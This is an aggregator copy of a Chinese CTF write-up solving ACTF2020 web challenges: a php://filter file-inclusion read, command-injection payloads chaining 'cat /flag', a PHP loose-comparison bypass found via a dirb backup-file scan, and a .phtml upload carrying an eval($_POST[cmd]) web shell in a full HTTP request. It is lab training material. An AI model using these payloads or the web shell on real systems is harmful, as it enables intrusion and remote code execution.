2

ACTF2020刷题

 1 year ago
source link: https://sunny250.github.io/2020/04/26/ACTF%E5%88%B7%E9%A2%982020/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

Include

简单为协议包含

?file=php://filter/convert.base64-encode/resource=flag.php  然后base64解密

echo "Can you find out the flag?";
//flag{9dc5b2d8-37cf-45a6-b5a3-68b3d5c6c2e5}

没有进行过滤处理,考的是linux的知识点。一行linux语句如何执行多条linux语句。使用&&连接,或者分号;隔开。也可以使用管道符号

但是在此处只能使用|和分号。(不太清楚)

payload

127.0.0.1 | cat /flag
或者
127.0.0.1;cat /flag

BackupFile

扫描目录发现备份文件

sunny250@kali ~ # dirb http://5c64e8b8-c5fa-41d4-8c5e-ad84cf14332e.node3.buuoj.cn/ ~/web/dictionaries/CTFwebdir.txt 

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Apr 26 13:01:43 2020
URL_BASE: http://5c64e8b8-c5fa-41d4-8c5e-ad84cf14332e.node3.buuoj.cn/
WORDLIST_FILES: /Users/sx/web/dictionaries/CTFwebdir.txt

-----------------

GENERATED WORDS: 53

---- Scanning URL: http://5c64e8b8-c5fa-41d4-8c5e-ad84cf14332e.node3.buuoj.cn/ ----
+ http://5c64e8b8-c5fa-41d4-8c5e-ad84cf14332e.node3.buuoj.cn/index.php.bak (CODE:200|SIZE:347)
+ http://5c64e8b8-c5fa-41d4-8c5e-ad84cf14332e.node3.buuoj.cn/flag.php (CODE:200|SIZE:0)

-----------------
END_TIME: Sun Apr 26 13:01:46 2020
DOWNLOADED: 53 - FOUND: 2

访问index.php.bak得到源码

<?php
include_once "flag.php";

if(isset($_GET['key'])) {
$key = $_GET['key'];
if(!is_numeric($key)) {
exit("Just num!");
}
$key = intval($key);
$str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";
if($key == $str) {
echo $flag;
}
}
else {
echo "Try to find out source file!";
}

若类型比较会先转换,字符串于整型对比,都会转换成整型。

参考文章

intval函数

输入key=123即可

Upload

打开题目是一个灯,鼠标移动到灯泡之后可以看见一个上传界面

直接上传1.php发现被禁止,尝试掐后缀,发现phtml可以

POST / HTTP/1.1
Host: 32d2077b-2b33-467c-93db-234875e1f69e.node3.buuoj.cn
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------380150826415384369013004740571
Content-Length: 406
Origin: http://32d2077b-2b33-467c-93db-234875e1f69e.node3.buuoj.cn
Connection: close
Referer: http://32d2077b-2b33-467c-93db-234875e1f69e.node3.buuoj.cn/
Upgrade-Insecure-Requests: 1

-----------------------------380150826415384369013004740571
Content-Disposition: form-data; name="upload_file"; filename="1.phtml"
Content-Type: image/gif

GIF89a
<script language="php">
eval($_POST[cmd]);
</script>
-----------------------------380150826415384369013004740571
Content-Disposition: form-data; name="submit"

upload
-----------------------------380150826415384369013004740571--

然后得到上传地址,使用蚁剑连接,拿flag


About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK